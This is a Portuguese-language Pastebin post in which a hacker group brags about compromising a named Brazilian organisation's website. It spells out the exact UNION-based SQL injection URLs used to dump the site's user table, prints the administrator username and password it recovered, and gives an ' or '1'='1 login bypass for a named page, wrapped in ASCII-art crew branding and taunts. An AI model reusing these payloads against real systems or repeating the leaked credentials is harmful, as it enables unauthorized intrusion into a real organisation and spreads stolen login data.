Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Heeeeeeeeeey ... Chegamos novamente... dessa vez para provar que a segurança virtual não existe ... e que consideramos como uma grande hipocrisia dos que acreditam nela.
- Sistemas são criados por pessoas como eu e você ... E TODOS NÓS ERRAMOS, portanto nenhum sistema é seguro.
- Mostraremos hoje um site que realmente nos deixou envergonhado... Pois profissionais na área da tecnologia deveriam ter vergonha de deixar falhas tão idiotas em um site reconhecido no país ...
- Segue abaixo as falhas e explorações encontradas pelo membro SPIRIT HACKER.
- =============================================================================================================================================
- $$$$$$$$\ $$\ $$\ $$$$$$\ $$$$$$$\ $$$$$$$\
- $$ _____| \__|$$ |$$ __$$\ $$ __$$\ $$ __$$\
- $$ | $$$$$$\ $$\ $$ |$$ / \__| $$$$$$\ $$$$$$$\ $$ | $$ |$$ | $$ |
- $$$$$\ \____$$\ $$ |$$ |\$$$$$$\ $$ __$$\ $$ _____|$$$$$$$\ |$$$$$$$ |
- $$ __|$$$$$$$ |$$ |$$ | \____$$\ $$$$$$$$ |$$ / $$ __$$\ $$ __$$<
- $$ | $$ __$$ |$$ |$$ |$$\ $$ |$$ ____|$$ | $$ | $$ |$$ | $$ |
- $$ | \$$$$$$$ |$$ |$$ |\$$$$$$ |\$$$$$$$\ \$$$$$$$\ $$$$$$$ |$$ | $$ |
- \__| \_______|\__|\__| \______/ \_______| \_______|\_______/ \__| \__|
- Spirit Hacker | Cr4ck3r_SI:~# /fuck | Talib Girl
- ================================================================================================================================================
- Site : http://www.anatec.org.br/
- Falhas: - ASP SQL injection Query Execution ... (ASP SQLI)
- - SQL injection basic (Login por Strings)
- ==============================================================================================================================================
- ASP SQL INJECTION QUERY EXECUTION
- http://www.anatec.org.br/pagina_geral.asp?ID=334' // Pagina com a falha.
- http://www.anatec.org.br/pagina_geral.asp?ID=-334+union+select+0,1,2,3,4,5,6,7,8,9+from+usuarios // Encontrada a Tabela de usuarios.
- http://www.anatec.org.br/pagina_geral.asp?ID=-334+union+select+0,1,2,3,nome,5,6,7,8,9+from+usuarios // Encontrada a coluna NOME...
- http://www.anatec.org.br/pagina_geral.asp?ID=-334+union+select+0,1,2,3,senha,5,6,7,8,9+from+usuarios // Encontrada a coluna SENHA...
- Nome: administrador
- Senha: lu
- ==================================================================================================================================================
- Admin Access for String
- http://www.anatec.org.br/empregos.asp // Pagina com a falha
- Usuario: ' or '1'='1
- Senha: VAZIA ...
- http://www.anatec.org.br/empregoslogado.asp?menu= // Pagina direcionada a string.
- ===================================================================================================================================================
- Login Page Not Found, using localhost ...
- ===================================================================================================================================================
- Cr3d1t5 f0r BrLo0ping //Encontrou a falha de acesso por String \\ , Geovane Silva (Antigo Coringa Cracker), Cracker_Si /fuck && TalibGirl
- F41L S3CUR17Y BR4S1L Pwn you !!!
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement